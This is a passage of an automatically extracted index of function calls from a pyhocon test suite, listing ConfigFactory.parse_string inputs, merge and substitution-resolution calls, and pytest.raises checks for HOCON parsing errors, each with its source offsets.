'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n longName: "long "${?name}\n """'], {'resolve': '(False)'}), '(\n u"""\n longName: "long "${?name}\n """, resolve=False)\n', (51219, 51299), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51556, 51729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """'], {}), '(\n """\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """\n )\n', (51582, 51729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52289, 52367), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52315, 52367), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52408, 52514), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = ${list} [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '(\n """\n list = ${list} [ 4, 5, 6 ]\n """, resolve=False)\n', (52434, 52514), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52740, 52818), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52766, 52818), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52859, 52957), 
'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list += [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '("""\n list += [ 4, 5, 6 ]\n """,\n resolve=False)\n', (52885, 52957), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53169, 53317), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """'], {'resolve': '(False)'}), '(\n """\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """\n , resolve=False)\n', (53195, 53317), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53360, 53464), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (53386, 53464), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53511, 53553), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (53535, 53553), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53562, 53604), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (53596, 53604), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53721, 53869), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """\n , resolve=False)\n', (53747, 53869), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53912, 54038), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """'], {'resolve': '(False)'}), '(\n """\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """,\n resolve=False)\n', (53938, 54038), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54081, 54123), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54105, 54123), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54132, 54174), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54166, 54174), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54381, 54503), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 1 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 1 }\n b = [${b1}]\n """,\n resolve=False)\n', (54407, 54503), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54547, 54648), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 2, v2: 3 }\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 2, v2: 3 }\n """, resolve=False)\n', (54573, 54648), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54695, 54737), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54719, 54737), False, 
'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54746, 54788), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54780, 54788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55017, 55092), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = { x: 1 }\n """'], {}), '("""\n dict = { x: 1 }\n """)\n', (55043, 55092), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55133, 55236), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = ${dict} { y: 2 }\n """'], {'resolve': '(False)'}), '(\n """\n dict = ${dict} { y: 2 }\n """, resolve=False)\n', (55159, 55236), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55455, 55527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = abc\n """'], {}), '("""\n string = abc\n """)\n', (55481, 55527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55568, 55669), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = ${string}def\n """'], {'resolve': '(False)'}), '(\n """\n string = ${string}def\n """, resolve=False)\n', (55594, 55669), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56004, 56096), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 1\n mid.b = 1\n """'], {}), '(\n """\n a = 1\n mid.b = 1\n """)\n', (56030, 56096), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56292, 56520), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """'], {}), '(\n """\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """\n )\n', (56318, 56520), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56921, 57053), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """'], {}), '(\n """\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """\n )\n', (56947, 57053), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57238, 57434), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """'], {}), '(\n """\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """\n )\n', (57264, 57434), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57729, 57825), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test = line1 line2\ntest2 = test\n """'], {}), '(\n """\n test = line1 line2\ntest2 = test\n """)\n', (57755, 57825), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), 
((58116, 58142), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58139, 58142), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58231, 58244), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58242, 58244), False, 'from collections import OrderedDict\n'), ((58355, 58381), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58378, 58381), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58469, 58482), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58480, 58482), False, 'from collections import OrderedDict\n'), ((58660, 58686), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58683, 58686), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58766, 59093), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """'], {}), '(\n """o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """\n )\n', (58792, 59093), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59449, 59659), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """'], {}), '(\n """base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """\n )\n', (59475, 59659), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59895, 59999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (59921, 59999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60652, 60724), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo bar\n """'], {}), '("""\n a = foo bar\n """)\n', (60678, 60724), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60874, 60961), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo "bar" dummy\n """'], {}), '(\n """\n a = foo "bar" dummy\n """)\n', (60900, 60961), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61128, 61351), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """'], {}), '(\n """\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """\n )\n', (61154, 61351), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61628, 61873), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """'], {'resolve': '(True)'}), '(\n """\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """\n , resolve=True)\n', (61654, 61873), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, 
ConfigTree\n'), ((62122, 62249), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = // abc\n abc\n\n c =\n 5\n """'], {}), '(\n """\n a = // abc\n abc\n\n c =\n 5\n """\n )\n', (62148, 62249), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62466, 62562), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string_from_env = ${STRING_VAR}\n """'], {}), '(\n """\n string_from_env = ${STRING_VAR}\n """)\n', (62492, 62562), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62805, 62896), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${STRING_VAR}\n """)\n', (62831, 62896), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63143, 63235), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${?STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${?STRING_VAR}\n """)\n', (63169, 63235), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63448, 63545), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bool_from_env = ${TRUE_OR_FALSE}\n """'], {}), '(\n """\n bool_from_env = ${TRUE_OR_FALSE}\n """)\n', (63474, 63545), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63790, 63880), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n int_from_env = ${INT_VAR}\n """'], {}), '(\n """\n int_from_env = ${INT_VAR}\n """)\n', (63816, 63880), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((64237, 64277), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['input_string'], {}), '(input_string)\n', (64263, 64277), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65203, 65332), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""'], {}), '(\n """\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""\n )\n', (65229, 65332), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65479, 65530), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:[""\\"foo""\\"", "bar"]"""'], {}), '(\'a:["""foo"""", "bar"]\')\n', (65505, 65530), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65653, 65697), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:{b: 3, d: 6}"""'], {}), "('a:{b: 3, d: 6}')\n", (65679, 65697), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66066, 66213), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """'], {}), '(\n """\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """\n )\n', (66092, 66213), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66358, 66483), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: {\n pb: 5\n }\n """'], {}), '(\n """\n a: 1\n b: 
{\n pb: 5\n }\n """\n )\n', (66384, 66483), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66570, 66693), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """'], {}), '(\n """\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """\n )\n', (66596, 66693), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66850, 66982), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """'], {}), '(\n """\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """\n )\n', (66876, 66982), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67124, 67268), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """'], {}), '(\n """\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """\n )\n', (67150, 67268), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67458, 68033), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """'], {}), '(\n """\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """\n )\n', (67484, 68033), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((68957, 68991), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['source'], {}), '(source)\n', (68983, 68991), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((69765, 69804), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (69791, 69804), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2231, 2264), 'pytest.raises', 'pytest.raises', (['ParseBaseException'], {}), '(ParseBaseException)\n', (2244, 2264), False, 'import pytest\n'), ((2496, 2525), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (2509, 2525), False, 'import pytest\n'), ((5331, 5347), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5337, 5347), True, 'from datetime import timedelta as period\n'), ((9465, 9502), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (9478, 9502), False, 'import pytest\n'), ((11308, 11347), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11321, 11347), False, 'import pytest\n'), ((11361, 11402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = [4] "4\\""""'], {}), '(\'a = [4] "4"\')\n', (11387, 11402), 
False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11416, 11455), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11429, 11455), False, 'import pytest\n'), ((11469, 11510), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = "4" [5]"""'], {}), '(\'a = "4" [5]\')\n', (11495, 11510), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11524, 11563), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11537, 11563), False, 'import pytest\n'), ((11577, 11621), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {b: 5} "4\\""""'], {}), '(\'a = {b: 5} "4"\')\n', (11603, 11621), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21736, 21778), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21749, 21778), False, 'import pytest\n'), ((21792, 21906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent}\n """'], {}), '(\n """\n common_modules = ${non_existent}\n """\n )\n', (21818, 21906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21941, 21983), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21954, 21983), False, 'import pytest\n'), ((21997, 22115), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent}\n """'], {}), '(\n """\n common_modules = abc ${non_existent}\n """\n )\n', (22023, 22115), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22150, 22192), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22163, 22192), False, 'import pytest\n'), ((22206, 22324), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent} abc\n """'], {}), '(\n """\n common_modules = ${non_existent} abc\n """\n )\n', (22232, 22324), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22359, 22401), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22372, 22401), False, 'import pytest\n'), ((22415, 22537), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent} def\n """'], {}), '(\n """\n common_modules = abc ${non_existent} def\n """\n )\n', (22441, 22537), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22620, 22659), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22633, 22659), False, 'import pytest\n'), ((22673, 22834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """\n )\n', (22699, 22834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22869, 22908), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), 
'(ConfigWrongTypeException)\n', (22882, 22908), False, 'import pytest\n'), ((22922, 23083), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """\n )\n', (22948, 23083), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23118, 23157), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23131, 23157), False, 'import pytest\n'), ((23171, 23335), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23197, 23335), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23370, 23409), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23383, 23409), False, 'import pytest\n'), ((23423, 23584), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """\n )\n', (23449, 23584), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23619, 23658), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23632, 23658), False, 'import pytest\n'), ((23672, 23833), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """\n )\n', (23698, 23833), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23868, 23907), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23881, 23907), False, 'import pytest\n'), ((23921, 24085), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23947, 24085), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27276, 27318), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27289, 27318), False, 'import pytest\n'), ((27332, 27408), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n """'], {}), '("""\n x = ${x}\n """)\n', (27358, 27408), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27509, 27551), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27522, 27551), False, 'import pytest\n'), ((27565, 27671), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n x = ${x}\n """'], {}), '(\n """\n x = ${x}\n x = ${x}\n """)\n', (27591, 27671), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29914, 29956), 'pytest.raises', 'pytest.raises', 
(['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (29927, 29956), False, 'import pytest\n'), ((29970, 30090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x} {y: 1}\n x = ${x.y}\n """'], {}), '(\n """\n x = ${x} {y: 1}\n x = ${x.y}\n """\n )\n', (29996, 30090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34630, 34665), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34643, 34665), False, 'import pytest\n'), ((34679, 34730), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules [perl]"""'], {}), "('common_modules [perl]')\n", (34705, 34730), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34745, 34774), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (34758, 34774), False, 'import pytest\n'), ((34788, 34845), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules {} {perl: 1}"""'], {}), "('common_modules {} {perl: 1}')\n", (34814, 34845), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34860, 34895), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34873, 34895), False, 'import pytest\n'), ((34909, 35043), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """'], {}), '(\n """\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """\n )\n', (34935, 35043), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), 